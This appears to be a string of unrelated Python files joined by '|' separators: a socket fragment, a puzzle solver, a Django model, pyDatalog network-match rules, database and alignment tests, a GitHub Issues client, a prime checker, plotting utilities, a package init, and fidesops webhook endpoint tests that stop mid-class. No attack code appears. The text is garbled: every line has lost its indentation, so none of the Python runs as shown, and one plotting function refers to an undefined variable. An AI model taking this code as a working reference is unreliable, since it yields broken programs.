client_socket.send(out_message_header + out_message)
time.sleep(0.1)
else:
out_message = str(steering).encode('utf-8')
out_message_header = f"{len(out_message):<{HEADER_LENGTH}}".encode('utf-8')
client_socket2.send(out_message_header + out_message)
time.sleep(0.1)
|
import sys
import copy
def main():
test_cases = open(sys.argv[1], 'r')
for test in test_cases:
test = test.strip()
if len(test) == 0:continue
wines = test.split('|')[0].strip().split(' ')
letters = list(test.split('|')[1].strip().lower())
result = []
for wine in wines:
original = wine
match = True
for letter in letters:
if letter not in wine.lower():
match = False
break
wine = wine.replace(letter, '', 1)
if match:
result.append(original)
print('False' if len(result) == 0 else ' '.join(result))
test_cases.close()
if __name__ == '__main__':
main()
|
from django.db import models
class Feedback(models.Model):
name = models.CharField(max_length=100,blank = False)
phone_no = models.CharField(max_length=100,blank = False, default=' ')
message = models.TextField(max_length=2000)
mail = models.EmailField(max_length=254)
def __str__(self):
return self.name
|
from pyDatalog import pyDatalog
from reg import *
pyDatalog.create_terms('X, Y, Z')
pyDatalog.create_terms('match_none')
pyDatalog.create_terms('datapath')
pyDatalog.create_terms('in_port')
pyDatalog.create_terms('reg_src')
pyDatalog.create_terms('reg_dst')
pyDatalog.create_terms('reg_outport')
pyDatalog.create_terms('reg_flag')
pyDatalog.create_terms('reg_2')
pyDatalog.create_terms('reg_3')
pyDatalog.create_terms('reg_4')
pyDatalog.create_terms('reg_5')
pyDatalog.create_terms('reg_6')
pyDatalog.create_terms('reg_7')
pyDatalog.create_terms('reg_8')
pyDatalog.create_terms('reg_9')
pyDatalog.create_terms('reg_10')
pyDatalog.create_terms('reg_11')
pyDatalog.create_terms('ip_proto')
pyDatalog.create_terms('ip_dst, ip_src')
pyDatalog.create_terms('ip_dst_prefix, ip_src_prefix')
pyDatalog.create_terms('ip_ttl')
pyDatalog.create_terms('eth_dst')
pyDatalog.create_terms('arp_proto')
pyDatalog.create_terms('arp_tpa')
pyDatalog.create_terms('arp_op')
pyDatalog.create_terms('icmp_proto, icmp_type, icmp_code')
def init_match_clause():
match_none(X) <= (X == [(NONE_IDX, )])
datapath(X, Y) <= (Y == [(REG_DP_IDX, X)])
in_port(X, Y) <= (Y == [(IN_PORT_IDX, X)])
reg_2(X, Y) <= (Y == [(REG2_IDX, X)])
reg_3(X, Y) <= (Y == [(REG3_IDX, X)])
reg_4(X, Y) <= (Y == [(REG4_IDX, X)])
reg_5(X, Y) <= (Y == [(REG5_IDX, X)])
reg_6(X, Y) <= (Y == [(REG6_IDX, X)])
reg_7(X, Y) <= (Y == [(REG7_IDX, X)])
reg_8(X, Y) <= (Y == [(REG8_IDX, X)])
reg_9(X, Y) <= (Y == [(REG9_IDX, X)])
reg_10(X, Y) <= (Y == [(REG10_IDX, X)])
reg_src(X, Y) <= (Y == [(REG_SRC_IDX, X)])
reg_dst(X, Y) <= (Y == [(REG_DST_IDX, X)])
reg_outport(X, Y) <= (Y == [(REG_OUTPORT_IDX, X)])
reg_flag(X, Y) <= (Y == [(REG_FLAG_IDX, X)])
ip_proto(X) <= (X == [(IP_PROTO_IDX, )])
ip_dst(X, Y) <= (Y == [(IP_DST_IDX, X)])
ip_src(X, Y) <= (Y == [(IP_SRC_IDX, X)])
ip_dst_prefix (X, Y, Z) <= (Z == [(IP_DST_IDX, X, Y)])
ip_src_prefix (X, Y, Z) <= (Z == [(IP_SRC_IDX, X, Y)])
ip_ttl(X, Y) <= (Y == [(IP_TTL_IDX, X)])
eth_dst(X, Y) <= (Y == [(ETH_DST_IDX, X)])
arp_proto(X) <= (X == [(ARP_PROTO_IDX, )])
arp_tpa(X, Y) <= (Y == [(ARP_TPA_IDX, X)])
arp_op(X, Y) <= (Y == [(ARP_OP_IDX, X)])
icmp_proto(X) <= (X == [(ICMP_PROTO_IDX, )])
icmp_type(X, Y) <= (Y == [(ICMP_TYPE_IDX, X)])
icmp_code(X, Y) <= (Y == [(ICMP_CODE_IDX, X)])
def convert_flags(flags):
# e.g flag = 1 means it occupies the first bit
# and flag = 4 means it occupies the third bit
sumflag = sum(flags)
return '{}/{}'.format(sumflag, sumflag)
def convert_tuple2match(match_tuple):
opcode_array = []
prev_flags = []
for match_exp in match_tuple:
match_type = match_exp[0]
if len(match_exp) >= 2:
match_parameter1 = match_exp[1]
if match_type == REG_FLAG_IDX:
# REG_FLAG_IDX match should get at least one parameter
prev_flags.append(match_parameter1)
# we change match_parameter1 here,
# and the below code will consume it
match_parameter1 = convert_flags(prev_flags)
exp = REG_MATCH_DICT[match_type]
if len(match_exp) == 2:
exp += '=' + str(match_parameter1)
elif len(match_exp) == 3:
# like ip_dst = xx.xx.xx.xx/16
match_parameter2 = match_exp[2]
exp += '=' + str(match_parameter1) + '/' + str(match_parameter2)
opcode_array.append(exp)
return ','.join(opcode_array)
|
import pytest
from sqlalchemy import select
from aerie import Aerie, DbSession
from aerie.exceptions import NoActiveSessionError
from tests.tables import User
@pytest.mark.asyncio
async def test_session_maintains_stack(db: Aerie) -> None:
async with db.session() as session:
assert len(DbSession.current_session_stack.get()) == 1
assert DbSession.get_current_session() == session
async with db.session() as session2:
assert len(DbSession.current_session_stack.get()) == 2
assert DbSession.get_current_session() == session2
await session.query(User).where(User.id == 1).all()
assert len(DbSession.current_session_stack.get()) == 1
assert len(DbSession.current_session_stack.get()) == 0
with pytest.raises(NoActiveSessionError):
assert DbSession.get_current_session() is None
@pytest.mark.asyncio
async def test_session_executes_selects(db: Aerie) -> None:
async with db.session() as session:
stmt = select(User).where(User.id == 1)
result = await session.execute(stmt)
assert result.scalars().one().name == 'User One'
|
from __future__ import print_function
from sistr.src.cgmlst.msa import msa_mafft, msa_ref_vs_novel, parse_aln_out
def test_parse_aln_out_string():
test_aln_str = """
>1
atgc-
>2
-tgca
>3
atgca
"""
aln_dict = {h:s for h,s in parse_aln_out(test_aln_str)}
assert "1" in aln_dict
assert "2" in aln_dict
assert "3" in aln_dict
assert aln_dict['1'] == 'atgc-'
assert aln_dict['2'] == '-tgca'
assert aln_dict['3'] == 'atgca'
print(aln_dict)
def test_msa_mafft_str():
test_input_str = """
>1
atgc
>2
tgca
>3
atgca
"""
aln_dict = msa_mafft(test_input_str)
assert isinstance(aln_dict, dict)
assert "1" in aln_dict
assert "2" in aln_dict
assert "3" in aln_dict
assert aln_dict['1'] == 'atgc-'
assert aln_dict['2'] == '-tgca'
assert aln_dict['3'] == 'atgca'
print(aln_dict)
def test_msa_ref_vs_novel():
ref_nt = 'atgtgc'
novel_nt = 'atgcatgc'
ref_msa, novel_msa = msa_ref_vs_novel(ref_nt, novel_nt)
assert novel_msa == novel_nt
assert ref_msa == '--atgtgc'
print(ref_nt, novel_nt)
print(ref_msa, novel_msa)
|
# -*- encoding: utf-8 -*-
from pygithub3.services.base import Service, MimeTypeMixin
from .comments import Comments
from .events import Events
from .labels import Labels
from .milestones import Milestones
class Issue(Service, MimeTypeMixin):
""" Consume `Issues API <http://developer.github.com/v3/issues>`_ """
def __init__(self, **config):
self.comments = Comments(**config)
self.events = Events(**config)
self.labels = Labels(**config)
self.milestones = Milestones(**config)
super(Issue, self).__init__(**config)
def list(self, **params):
""" List your issues
:param str filter: 'assigned', 'created', 'mentioned' or 'subscribed'
:param str state: 'open' or 'closed'
:param str labels: List of comma separated Label names. e.g: bug,ui,
@high
:param str sort: 'created', 'updated' or 'comments'
:param str direction: 'asc' or 'desc'
:param datetime since: Date filter (datetime or str in ISO 8601)
:returns: A :doc:`result`
.. warning::
You must be authenticated
"""
request = self.request_builder('issues.list')
return self._get_result(request, **params)
def list_by_repo(self, user=None, repo=None, **params):
""" List issues for a repo
:param str milestone: Milestone ID, 'none' or '*'
:param str state: 'open' or 'closed'
:param str assignee: Username, 'none' or '*'
:param str mentioned: Username
:param str labels: List of comma separated Label names. e.g: bug,ui,
@high
:param str sort: 'created', 'updated' or 'comments'
:param str direction: 'asc' or 'desc'
:param datetime since: Date filter (datetime or str in ISO 8601)
:returns: A :doc:`result`
.. note::
Remember :ref:`config precedence`
"""
request = self.make_request('issues.list_by_repo', user=user,
repo=repo)
return self._get_result(request, **params)
def get(self, number, user=None, repo=None):
""" Get a single issue
:param int number: Issue number
:param str user: Username
:param str repo: Repo name
.. note::
Remember :ref:`config precedence`
"""
request = self.make_request('issues.get', user=user, repo=repo,
number=number)
return self._get(request)
def create(self, data, user=None, repo=None):
""" Create an issue
:param dict data: Input. See `github issues doc`_
:param str user: Username
:param str repo: Repo name
.. warning::
You must be authenticated
.. note::
Remember :ref:`config precedence`
::
issues_service.create(dict(title='My test issue',
body='This needs to be fixed ASAP.',
assignee='copitux'))
"""
request = self.make_request('issues.create', user=user, repo=repo,
body=data)
return self._post(request)
def update(self, number, data, user=None, repo=None):
""" Update an issue
:param int number: Issue number
:param dict data: Input. See `github issues doc`_
:param str user: Username
:param str repo: Repo name
.. warning::
You must be authenticated
.. note::
Remember :ref:`config precedence`
"""
request = self.make_request('issues.update', user=user, repo=repo,
number=number, body=data)
return self._patch(request)
|
def primeNumber(n):
if (n==2):
return True
if n==1 or n%2==0:
return False
i=2
while i*i<=n:
if n%i==0:
return False
i+=1
return True
if __name__=="__main__":
n=int(input(""))
if primeNumber(n):
print(f"{n} is a prime number")
else:
print(f"{n} is not a prime number")
|
"""
DeepInsight Toolbox
© Markus Frey
https://github.com/CYHSM/DeepInsight
Licensed under MIT License
"""
import numpy as np
import h5py
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
sns.set_style('white')
def plot_frequencies(fp_hdf_out, output_names, aggregator=np.mean, frequency_spacing=1):
"""
Plots influence plots for each output
Parameters
----------
fp_hdf_out : str
File path to HDF5 file
aggregator : function handle, optional
Which aggregator to use for plotting the lineplots, by default np.mean
frequency_spacing : int, optional
Spacing on x axis between frequencies, by default 1
"""
fig, axes = plt.subplots(1, len(output_names), figsize=(16, 5))
axes = np.array(axes)
axes = axes.flat
# Read data from HDF5 file
hdf5_file = h5py.File(fp_hdf_out, mode='r')
losses = hdf5_file["analysis/losses"][()]
shuffled_losses = hdf5_file["analysis/influence/shuffled_losses"][()]
frequencies = hdf5_file["inputs/fourier_frequencies"][()].astype(np.float32)
np.savetxt(path_to_save+"_frequencies.csv", frequencies, delimiter=",")
hdf5_file.close()
# Calculate residuals, make sure there is no division by zero by adding small constant. TODO Should be relative to loss
residuals = (shuffled_losses - losses) / (losses + 0.1)
# Plot
for all_residuals, ax, on in zip(residuals.transpose(), axes, output_names):
residuals_mean = np.mean(all_residuals, axis=0)
all_residuals = all_residuals / np.sum(residuals_mean)
df_to_plot = pd.DataFrame(all_residuals).melt()
df_to_plot.to_csv(path_to_save+".csv")
sns.lineplot(x="variable", y="value", data=df_to_plot, ax=ax, estimator=aggregator, ci=68, marker='o',
color='k').set(xlabel='Frequencies (Hz)', ylabel='Frequency Influence (%)')
ax.set_xticks(np.arange(0, len(frequencies), frequency_spacing))
ax.set_xticklabels(np.round(frequencies[0::frequency_spacing], 2), fontsize=8, rotation=45)
ax.set_title(on)
for ax in axes:
ax.invert_xaxis()
sns.despine()
fig.tight_layout()
fig.show()
def plot_channels(fp_hdf_out, output_names, aggregator=np.mean, frequency_spacing=1, channels=None, path_to_save="path_to_save"):
"""
Plots influence plots for each output
Parameters
----------
fp_hdf_out : str
File path to HDF5 file
aggregator : function handle, optional
Which aggregator to use for plotting the lineplots, by default np.mean
frequency_spacing : int, optional
Spacing on x axis between frequencies, by default 1
"""
fig, axes = plt.subplots(1, len(output_names), figsize=(16, 5))
axes = np.array(axes)
axes = axes.flat
# Read data from HDF5 file
hdf5_file = h5py.File(fp_hdf_out, mode='r')
losses = hdf5_file["analysis/losses"][()]
shuffled_losses = hdf5_file["analysis/influence/shuffled_losses"][()]
frequencies = hdf5_file["inputs/fourier_frequencies"][()].astype(np.float32)
np.savetxt(path_to_save+"_frequencies.csv", frequencies, delimiter=",")
hdf5_file.close()
# Calculate residuals, make sure there is no division by zero by adding small constant. TODO Should be relative to loss
residuals = (shuffled_losses - losses) / (losses + 0.1)
# Plot
for all_residuals, ax, on in zip(residuals.transpose(), axes, output_names):
residuals_mean = np.mean(all_residuals, axis=0)
all_residuals = all_residuals / np.sum(residuals_mean)
df_to_plot = pd.DataFrame(all_residuals).melt()
df_to_plot.to_csv(path_to_save+".csv")
sns.barplot(x="variable", y="value", data=df_to_plot, color="salmon", saturation=.25, ax=ax).set(xlabel='Channels', ylabel='Channels Influence (%)')
ax.set_xticks(np.arange(0, 9, frequency_spacing))
ax.set_xticklabels(channels, fontsize=8, rotation=45)
ax.set_title(on)
for ax in axes:
ax.invert_xaxis()
sns.despine()
fig.tight_layout()
fig.show()
|
try:
from importlib_metadata import version # type: ignore
except ImportError:
from importlib.metadata import version # type: ignore
from nxp_imu.I2C import I2C
from nxp_imu.IMU import IMU
__version__ = version("nxp_imu")
__author__ = 'Kevin J. Walchko'
__license__ = 'MIT'
__copyright__ = '2017 Kevin J. Walchko'
|
import json
from typing import Dict
import pytest
from fidesops.api.v1.scope_registry import (
WEBHOOK_READ,
WEBHOOK_CREATE_OR_UPDATE,
POLICY_READ,
WEBHOOK_DELETE,
)
from fidesops.api.v1.urn_registry import (
V1_URL_PREFIX,
POLICY_WEBHOOKS_PRE,
POLICY_WEBHOOKS_POST,
POLICY_PRE_WEBHOOK_DETAIL,
POLICY_POST_WEBHOOK_DETAIL,
)
from fidesops.models.connectionconfig import ConnectionConfig
from fidesops.models.policy import PolicyPreWebhook, PolicyPostWebhook
from tests.api.v1.endpoints.test_privacy_request_endpoints import stringify_date
def embedded_http_connection_config(connection_config: ConnectionConfig) -> Dict:
"""Helper to reduce clutter - a lot of the tests below assert the entire response body, which includes the
https connection config"""
return {
"name": connection_config.name,
"key": connection_config.key,
"connection_type": "https",
"access": connection_config.access.value,
"created_at": stringify_date(connection_config.created_at),
"updated_at": stringify_date(connection_config.updated_at),
"last_test_timestamp": None,
"last_test_succeeded": None,
}
class TestGetPolicyPreExecutionWebhooks:
@pytest.fixture(scope="function")
def url(self, policy) -> str:
return V1_URL_PREFIX + POLICY_WEBHOOKS_PRE.format(policy_key=policy.key)
def test_get_pre_execution_webhooks_unauthenticated(self, url, api_client):
resp = api_client.get(url)
assert resp.status_code == 401
def test_get_pre_execution_webhooks_wrong_scope(
self, url, api_client, generate_auth_header
):
auth_header = generate_auth_header(scopes=[POLICY_READ])
resp = api_client.get(
url,
headers=auth_header,
)
assert resp.status_code == 403
def test_invalid_policy(self, db, api_client, generate_auth_header):
url = V1_URL_PREFIX + POLICY_WEBHOOKS_PRE.format(policy_key="my_fake_policy")
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.get(url, headers=auth_header)
assert resp.status_code == 404
body = json.loads(resp.text)
assert body["detail"] == "No Policy found for key my_fake_policy."
def test_get_pre_execution_policy_webhooks(
self,
url,
db,
api_client,
generate_auth_header,
policy_pre_execution_webhooks,
https_connection_config,
):
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.get(url, headers=auth_header)
assert resp.status_code == 200
body = json.loads(resp.text)
assert body == {
"items": [
{
"direction": "one_way",
"key": "pre_execution_one_way_webhook",
"name": policy_pre_execution_webhooks[0].name,
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 0,
},
{
"direction": "two_way",
"key": "pre_execution_two_way_webhook",
"name": policy_pre_execution_webhooks[1].name,
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 1,
},
],
"total": 2,
"page": 1,
"size": 50,
}
class TestGetPolicyPostExecutionWebhooks:
@pytest.fixture(scope="function")
def url(self, policy) -> str:
return V1_URL_PREFIX + POLICY_WEBHOOKS_POST.format(policy_key=policy.key)
def test_get_post_execution_webhooks_unauthenticated(self, url, api_client):
resp = api_client.get(url)
assert resp.status_code == 401
def test_get_post_execution_webhooks_wrong_scope(
self, url, api_client, generate_auth_header
):
auth_header = generate_auth_header(scopes=[POLICY_READ])
resp = api_client.get(
url,
headers=auth_header,
)
assert resp.status_code == 403
def test_invalid_policy(self, db, api_client, generate_auth_header):
url = V1_URL_PREFIX + POLICY_WEBHOOKS_PRE.format(policy_key="my_fake_policy")
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.get(url, headers=auth_header)
assert resp.status_code == 404
body = json.loads(resp.text)
assert body["detail"] == "No Policy found for key my_fake_policy."
def test_get_post_execution_policy_webhooks(
self,
url,
db,
api_client,
generate_auth_header,
policy_post_execution_webhooks,
https_connection_config,
):
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.get(url, headers=auth_header)
assert resp.status_code == 200
body = json.loads(resp.text)
assert body == {
"items": [
{
"direction": "one_way",
"key": "cache_busting_webhook",
"name": policy_post_execution_webhooks[0].name,
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 0,
},
{
"direction": "one_way",
"key": "cleanup_webhook",
"name": policy_post_execution_webhooks[1].name,
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 1,
},
],
"total": 2,
"page": 1,
"size": 50,
}
class TestGetPolicyPreExecutionWebhookDetail:
@pytest.fixture(scope="function")
def url(self, policy, policy_pre_execution_webhooks) -> str:
return V1_URL_PREFIX + POLICY_PRE_WEBHOOK_DETAIL.format(
policy_key=policy.key, pre_webhook_key=policy_pre_execution_webhooks[0].key
)
def test_get_pre_execution_webhook_detail_unauthenticated(self, url, api_client):
resp = api_client.get(url)
assert resp.status_code == 401
def test_get_pre_execution_webhook_detail_wrong_scope(
self, url, api_client, generate_auth_header
):
auth_header = generate_auth_header(scopes=[POLICY_READ])
resp = api_client.get(
url,
headers=auth_header,
)
assert resp.status_code == 403
def test_invalid_policy(
self, db, api_client, generate_auth_header, policy_pre_execution_webhooks
):
url = V1_URL_PREFIX + POLICY_PRE_WEBHOOK_DETAIL.format(
policy_key="my_fake_policy",
pre_webhook_key=policy_pre_execution_webhooks[0].key,
)
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.get(url, headers=auth_header)
assert resp.status_code == 404
body = json.loads(resp.text)
assert body["detail"] == "No Policy found for key my_fake_policy."
def test_webhook_not_on_policy(
self,
db,
api_client,
generate_auth_header,
erasure_policy,
policy_pre_execution_webhooks,
):
url = V1_URL_PREFIX + POLICY_PRE_WEBHOOK_DETAIL.format(
policy_key=erasure_policy.key,
pre_webhook_key=policy_pre_execution_webhooks[0].key,
)
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.get(url, headers=auth_header)
assert resp.status_code == 404
body = json.loads(resp.text)
assert (
body["detail"]
== "No Pre-Execution Webhook found for key 'pre_execution_one_way_webhook' on Policy 'example_erasure_policy'."
)
def test_get_pre_execution_policy_webhook_detail(
self,
url,
db,
api_client,
generate_auth_header,
policy_pre_execution_webhooks,
https_connection_config,
):
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.get(url, headers=auth_header)
assert resp.status_code == 200
body = json.loads(resp.text)
assert body == {
"direction": "one_way",
"key": "pre_execution_one_way_webhook",
"name": policy_pre_execution_webhooks[0].name,
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 0,
}
class TestGetPolicyPostExecutionWebhookDetail:
@pytest.fixture(scope="function")
def url(self, policy, policy_post_execution_webhooks) -> str:
return V1_URL_PREFIX + POLICY_POST_WEBHOOK_DETAIL.format(
policy_key=policy.key,
post_webhook_key=policy_post_execution_webhooks[0].key,
)
def test_get_post_execution_webhook_detail_unauthenticated(self, url, api_client):
resp = api_client.get(url)
assert resp.status_code == 401
def test_get_post_execution_webhook_detail_wrong_scope(
self, url, api_client, generate_auth_header
):
auth_header = generate_auth_header(scopes=[POLICY_READ])
resp = api_client.get(
url,
headers=auth_header,
)
assert resp.status_code == 403
def test_invalid_policy(
self, db, api_client, generate_auth_header, policy_post_execution_webhooks
):
url = V1_URL_PREFIX + POLICY_POST_WEBHOOK_DETAIL.format(
policy_key="my_fake_policy",
post_webhook_key=policy_post_execution_webhooks[0].key,
)
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.get(url, headers=auth_header)
assert resp.status_code == 404
body = json.loads(resp.text)
assert body["detail"] == "No Policy found for key my_fake_policy."
def test_webhook_not_on_policy(
self,
db,
api_client,
generate_auth_header,
erasure_policy,
policy_post_execution_webhooks,
):
url = V1_URL_PREFIX + POLICY_POST_WEBHOOK_DETAIL.format(
policy_key=erasure_policy.key,
post_webhook_key=policy_post_execution_webhooks[0].key,
)
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.get(url, headers=auth_header)
assert resp.status_code == 404
body = json.loads(resp.text)
assert (
body["detail"]
== "No Post-Execution Webhook found for key 'cache_busting_webhook' on Policy 'example_erasure_policy'."
)
def test_get_pre_execution_policy_webhook_detail(
self,
url,
db,
api_client,
generate_auth_header,
policy_post_execution_webhooks,
https_connection_config,
):
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.get(url, headers=auth_header)
assert resp.status_code == 200
body = json.loads(resp.text)
assert body == {
"direction": "one_way",
"key": "cache_busting_webhook",
"name": policy_post_execution_webhooks[0].name,
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 0,
}
class TestPutPolicyPreExecutionWebhooks:
@pytest.fixture(scope="function")
def valid_webhook_request(self, https_connection_config) -> Dict:
return {
"connection_config_key": https_connection_config.key,
"direction": "one_way",
"name": "Poke Snowflake Webhook",
"key": "poke_snowflake_webhook",
}
@pytest.fixture(scope="function")
def url(self, policy) -> str:
return V1_URL_PREFIX + POLICY_WEBHOOKS_PRE.format(policy_key=policy.key)
def test_put_pre_execution_webhooks_unauthenticated(self, url, api_client):
resp = api_client.put(url)
assert resp.status_code == 401
def test_put_pre_execution_webhooks_wrong_scope(
self, url, api_client, generate_auth_header
):
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.put(
url,
headers=auth_header,
)
assert resp.status_code == 403
def test_invalid_policy(
self, db, api_client, generate_auth_header, valid_webhook_request
):
url = V1_URL_PREFIX + POLICY_WEBHOOKS_PRE.format(policy_key="my_fake_policy")
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.put(url, headers=auth_header, json=[valid_webhook_request])
assert resp.status_code == 404
body = json.loads(resp.text)
assert body["detail"] == "No Policy found for key my_fake_policy."
assert db.query(PolicyPreWebhook).count() == 0 # All must succeed or fail
def test_invalid_connection_config(
self, db, url, api_client, generate_auth_header, valid_webhook_request
):
invalid_connection_config_body = {
"connection_config_key": "unknown_connection_key",
"direction": "one_way",
"name": "my_pre_execution_webhook",
}
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.put(
url,
headers=auth_header,
json=[valid_webhook_request, invalid_connection_config_body],
)
assert resp.status_code == 404
body = json.loads(resp.text)
assert (
body["detail"]
== "No connection configuration found with key 'unknown_connection_key'."
)
assert db.query(PolicyPreWebhook).count() == 0 # All must succeed or fail
def test_direction_error_fails_all(
self,
db,
https_connection_config,
generate_auth_header,
api_client,
url,
valid_webhook_request,
):
invalid_connection_config_body = {
"connection_config_key": https_connection_config.key,
"direction": "invalid_direction",
"name": "my_pre_execution_webhook",
}
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.put(
url,
headers=auth_header,
json=[valid_webhook_request, invalid_connection_config_body],
)
assert resp.status_code == 422
body = json.loads(resp.text)
assert (
body["detail"][0]["msg"]
== "value is not a valid enumeration member; permitted: 'one_way', 'two_way'"
)
assert db.query(PolicyPreWebhook).count() == 0 # All must succeed or fail
def test_put_pre_execution_webhooks_duplicate_keys(
self,
db,
url,
api_client,
generate_auth_header,
valid_webhook_request,
https_connection_config,
):
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.put(
url,
headers=auth_header,
json=[valid_webhook_request, valid_webhook_request],
)
assert resp.status_code == 400
body = json.loads(resp.text)
assert (
body["detail"]
== "Check request body: there are multiple webhooks whose keys or names resolve to the same value."
)
name_only = {
"connection_config_key": https_connection_config.key,
"direction": "one_way",
"name": "Poke Snowflake Webhook",
}
resp = api_client.put(
url, headers=auth_header, json=[valid_webhook_request, name_only]
)
assert resp.status_code == 400
body = json.loads(resp.text)
assert (
body["detail"]
== "Check request body: there are multiple webhooks whose keys or names resolve to the same value."
)
assert db.query(PolicyPreWebhook).count() == 0 # All must succeed or fail
def test_put_pre_execution_webhooks_duplicate_names(
self,
db,
url,
api_client,
generate_auth_header,
valid_webhook_request,
https_connection_config,
):
second_payload = valid_webhook_request.copy()
second_payload["key"] = "new_key"
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.put(
url,
headers=auth_header,
json=[valid_webhook_request, valid_webhook_request],
)
assert resp.status_code == 400
body = json.loads(resp.text)
assert (
body["detail"]
== "Check request body: there are multiple webhooks whose keys or names resolve to the same value."
)
def test_create_multiple_pre_execution_webhooks(
self,
db,
generate_auth_header,
api_client,
url,
valid_webhook_request,
https_connection_config,
):
second_webhook_body = {
"connection_config_key": https_connection_config.key,
"direction": "two_way",
"name": "My Pre Execution Webhook",
}
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.put(
url,
headers=auth_header,
json=[valid_webhook_request, second_webhook_body],
)
assert resp.status_code == 200
body = json.loads(resp.text)
assert len(body) == 2
assert body == [
{
"direction": "one_way",
"key": "poke_snowflake_webhook",
"name": "Poke Snowflake Webhook",
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 0,
},
{
"direction": "two_way",
"key": "my_pre_execution_webhook",
"name": "My Pre Execution Webhook",
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 1,
},
]
pre_webhooks = PolicyPreWebhook.filter(
db=db,
conditions=(
PolicyPreWebhook.key.in_(
["my_pre_execution_webhook", "poke_snowflake_webhook"]
)
),
)
assert pre_webhooks.count() == 2
for webhook in pre_webhooks:
webhook.delete(db=db)
def test_update_webhooks_reorder(
self,
db,
generate_auth_header,
api_client,
url,
policy_pre_execution_webhooks,
https_connection_config,
):
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
assert policy_pre_execution_webhooks[0].key == "pre_execution_one_way_webhook"
assert policy_pre_execution_webhooks[0].order == 0
assert policy_pre_execution_webhooks[1].key == "pre_execution_two_way_webhook"
assert policy_pre_execution_webhooks[1].order == 1
# Flip the order in the request
request_body = [
{
"connection_config_key": https_connection_config.key,
"direction": policy_pre_execution_webhooks[1].direction.value,
"name": policy_pre_execution_webhooks[1].name,
"key": policy_pre_execution_webhooks[1].key,
},
{
"connection_config_key": https_connection_config.key,
"direction": policy_pre_execution_webhooks[0].direction.value,
"name": policy_pre_execution_webhooks[0].name,
"key": policy_pre_execution_webhooks[0].key,
},
]
resp = api_client.put(
url,
headers=auth_header,
json=request_body,
)
body = json.loads(resp.text)
assert body[0]["key"] == "pre_execution_two_way_webhook"
assert body[0]["order"] == 0
assert body[1]["key"] == "pre_execution_one_way_webhook"
assert body[1]["order"] == 1
def test_update_hooks_remove_hook_from_request(
self,
db,
generate_auth_header,
api_client,
url,
policy_pre_execution_webhooks,
https_connection_config,
):
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
# Only include one hook
request_body = [
{
"connection_config_key": https_connection_config.key,
"direction": policy_pre_execution_webhooks[0].direction.value,
"name": policy_pre_execution_webhooks[0].name,
"key": policy_pre_execution_webhooks[0].key,
},
]
resp = api_client.put(
url,
headers=auth_header,
json=request_body,
)
body = json.loads(resp.text)
assert len(body) == 1 # Other webhook was removed
assert body[0]["key"] == "pre_execution_one_way_webhook"
assert body[0]["order"] == 0
class TestPutPolicyPostExecutionWebhooks:
"""Shares a lot of logic with Pre Execution Webhooks - see TestPutPolicyPreExecutionWebhooks tests"""
@pytest.fixture(scope="function")
def valid_webhook_request(self, https_connection_config) -> Dict:
return {
"connection_config_key": https_connection_config.key,
"direction": "one_way",
"name": "Clear App Cache",
"key": "clear_app_cache",
}
@pytest.fixture(scope="function")
def url(self, policy) -> str:
return V1_URL_PREFIX + POLICY_WEBHOOKS_POST.format(policy_key=policy.key)
def test_put_post_execution_webhooks_unauthenticated(self, url, api_client):
resp = api_client.put(url)
assert resp.status_code == 401
def test_put_post_execution_webhooks_wrong_scope(
self, url, api_client, generate_auth_header
):
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.put(
url,
headers=auth_header,
)
assert resp.status_code == 403
def test_create_multiple_post_execution_webhooks(
self,
db,
generate_auth_header,
api_client,
url,
valid_webhook_request,
https_connection_config,
):
second_webhook_body = {
"connection_config_key": https_connection_config.key,
"direction": "two_way",
"name": "My Post Execution Webhook",
}
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.put(
url,
headers=auth_header,
json=[valid_webhook_request, second_webhook_body],
)
assert resp.status_code == 200
body = json.loads(resp.text)
assert len(body) == 2
assert body == [
{
"direction": "one_way",
"key": "clear_app_cache",
"name": "Clear App Cache",
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 0,
},
{
"direction": "two_way",
"key": "my_post_execution_webhook",
"name": "My Post Execution Webhook",
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 1,
},
]
post_webhooks = PolicyPostWebhook.filter(
db=db,
conditions=(
PolicyPostWebhook.key.in_(
["my_post_execution_webhook", "clear_app_cache"]
)
),
)
assert post_webhooks.count() == 2
for webhook in post_webhooks:
webhook.delete(db=db)
class TestPatchPreExecutionPolicyWebhook:
"""Test updating a single PolicyPreWebhook - however, updates to "order" can affect the orders of other webhooks"""
@pytest.fixture(scope="function")
def url(self, policy, policy_pre_execution_webhooks) -> str:
